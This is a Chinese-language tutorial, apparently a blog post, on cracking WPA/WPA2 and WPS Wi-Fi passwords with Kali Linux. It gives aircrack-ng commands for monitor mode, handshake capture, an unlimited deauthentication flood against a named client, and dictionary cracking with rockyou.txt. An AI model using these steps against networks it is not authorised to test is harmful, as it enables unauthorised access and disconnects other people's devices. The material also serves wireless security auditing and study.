现行的无线协议标准在安全方面是完全达标的,是非常安全的。如果现行的无线标准在很被攻破了,业界为什么还一直在使用这一标准。
因此,破解之所以能成功,完全是因为USR配置路由器不当和密码强度低的漏洞罢了。
普通无线加密及破解的分类:
1,wep加密:此类加密比较老旧,现在的无线路由器已经很少使用此类加密方式,破解只需要大量的数据包即可。
2,WPA / WPA2 PSK加密:这类加密是很安全的,破解的方式是抓握手包然后跑字典。
3,一部分路由器为了方便用户,设置了QSS快速连接功能(或者叫WPS功能)。破解方式是抓握手包跑字典和跑PIN码2种。
工具:
1,一块支持混杂模式(监听模式)的无线网卡。
2,一个支持无线破解工具的系统(像的CDlinux的,卡利,BT5等)
3,一台配置不错的电脑以及强大的字典
工具作用:
无线网卡:用来抓包,要想破解无线你必须把空中的无线数据监听下来,存成一个文件网卡只有这一个功能,也只有这一个用处,就是用它来抓取周围的无线数据包,把它存到文件里。供后来的程序分析用。
系统:用来驱动网卡和分析数据网卡虽然能支持混杂模式(监听模式),但是需要系统驱动程序来调用它,不是所有的系统都能支持把网卡设置为监听模式,这里我们一般用的就是卡利,把CDlinux的。
配置不错的电脑:用来计算密码明文因为周围的数据包都是加密的,网卡监听到的数据自然也是加密的,要想通过这些加密的数据把密码计算出来,我们需要一台计算能力强劲的电脑,以及一本强大的字典。
WEP加密的就不谈了,无非就是抓上个十分钟的IVS数据包,然后用工具计算出来即可。
1,WPA / WPA2破解原理
首先要抓包:这一步主要靠网卡。
什么是握手包:无线信号是加密的,如果你要连接无线路由器,就要给路由器发送一个请求,请求和无线路由器建立连接,这个请求就在一个你要发送的数据包里,学名叫握手包,这个包里面包含了你发送过去的一个密码,但是这个密码是加密的。
所以我们要破解的无线网络连接我们首先要抓到这个包,里面有加密过的密码,我们只要抓到这个包,再用电脑根据这个加密后的数据反算密码就行了。
而握手包只在设备与路由器刚开始连接的时候由设备发送给路由器,认证成功后就不再发送了,所以我们要想抓住这个包我们必须等到有设备和路由器刚要建立连接时来抓,当然我们有更好的方法,就是用一个方法断开一个已经连接到路由器的设备,等它再自动和路由器连接的时候抓住那个握手包。
然后就是跑包,这一步就和网卡没有关系了,全靠电脑和字典。
跑包:跑包就是用同样的算法把字典里的密码加密,然后将结果与握手包里的密文进行比对如果一样那么也就知道了原密码说白了就是拿密码一个个的试,看看哪个是对的。
因此跑包能不能跑出来完全取决你的字典里有没有包含真正的密码。还取决于你的电脑配置够不够强,能不能在可以等待的时间内跑完字典。
2,破解WPS路由器
这个要求路由器开了WPS,而且还没有做WPS连接限制和尝试时间间隔限制,并且信号还要好在PWR在70的绝对值以内。
移步:https://blog.csdn.net/tanyl168/article/details/84768957 (Reaver无线破解工具 - 穷举PIN码破解简析)
https://blog.csdn.net/tanyl168/article/details/84770597 (Fern wifi cracker 无线破解工具——图解)
详细步骤:
1.开启kali系统后,插入最常见使用3370芯片的USB无线网卡,免驱。检查网卡,及状态.
root@ kali:~#ifconfig -a
root@kali:~# ifconfig //查看网络配置,网卡是否加载成功。有时需要加 -a参数
网卡加载成功,一般在下方会显示3块:
etho:
lo:
wlan0:常见的网卡名称则显示在此。若未加载成功,请查看vmware的player选项内,可移动设备。或按提示安装驱动。
2.开启网卡监听模式
root @ kali:~#airmon-ng start wlan0
root@kali:~# airmon-ng start wlan0 //wlan0为前面查到的网卡名称
可再通过ifconfig命令,查看监听模式是否开启成功。此时成功开启监听,网卡名称变成了:wlan0mon
3.扫描监听热点
root @ kali:〜#airodump-ng wlan0mon
root@kali: ~# airodump-ng wlan0mon
4.选择一个来抓取握手包
root @kali:〜#airodump-ng -c <信道> --bssid <路由ID> -w <存储抓包的目录名称> <网卡名称>
root@kali: ~# airodump-ng -c 3 --bssid D4:EE:07:39:F5:DE -w /root/桌面 wlan0mon
//等待新设备连接,抓取握手包或进行第5步
5.洪水攻击,强制打掉重连
root@kali:〜#aireplay-ng -0 0 -a
root@kali: ~#aireplay-ng -0 0 -a D4:EE:07:39:F5:DE -c D8:5D:E2:96:AB:EB wlan0mon
// - 0参数为用deauth洪水攻击,0为无限,-0 5则攻击5次,数字表示次数。
攻击原理是:。先打掉USR的无线网络连接,消除身份认证此时MAC电脑,PC,手机USR只能手动连接,若无限攻击则USR无法连接上客户端会要求重输密码,这时会有握手包,如不断开攻击,则一直无法连接上。
假如攻击2次停止,USR客户端会自动重连,这时亦会自动抓取握手包。
6.停止攻击
ctrl + c当终端右上方出现:WPA握手:D8:5D:22:96:AB字样则说明抓包完成,停止攻击
抓包完成可关闭监听模式:root @ kali:〜#airmon- ng stop wlan0mon(网卡名)
root@kali: ~# airmon-ng stop wlan0mon(网卡名)
7.爆破
root @ kali:〜#aircrack-ng -w /usr/share/wordlists/rockyou.txt / root /桌面-1.cap
root@kali: ~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/桌面-1.cap
// - a2参数:<代表WPA握手包>,可添加至命令执行
// - w参数:指定字典文件路径,rockyou.txt为kali自带字典,使用前须先解压:
root @ kali:〜#gzip -d /usr/share/wordlists/rockyou.txt.gz
// root /桌面-1.cap:抓取的密码包路径(可通过手动查看相应路径)
8.静待结果
一本强大的字典能加快跑包成功的效率和成功率。跑包成功会在中间有提示!
后记:
Aircrack- ng是评估WiFi网络安全性的一整套工具。
- Aircrack-ng无线密码破解
- Aireplay-ng流量生成和客户端认证
- Airodump-ng数据包捕获
- Airbase-ng虚假接入点配置
它侧重于无线网络安全的不同领域:
监控:数据包捕获和数据导出到文本文件,以供工具第三方进一步处理
攻击:通过数据包注入重播攻击,解除身份验证,虚假接入点等
测试:检查无线网络卡和驱动程序功能(捕获和注入)
破解:WEP和WPA PSK(WPA 1和2)
。所有工具都是命令行,允许繁重的脚本很多GUI都利用了这个功能它主要用于Linux的,
但也适用于视窗,OS X,FreeBSD中,OpenBSD,NetBSD,以及Solaris甚至eComStation 2。
如果您在注入问题时遇到问题,或者如果您在airodump-ng(屏幕右上角)或aireplay-ng中收到有关通道-1或固定通道的错误消息,请airmon-ng check kill在将无线卡放入监视器之前使用网络管理器模式
.root@kali:~# airmon-ng check kill此命令会关闭影响破解程序的进程。可在破解前使用
<无线审计随笔,仅作学习参考使用,参考文献:37实验室,Aircrack和了社区>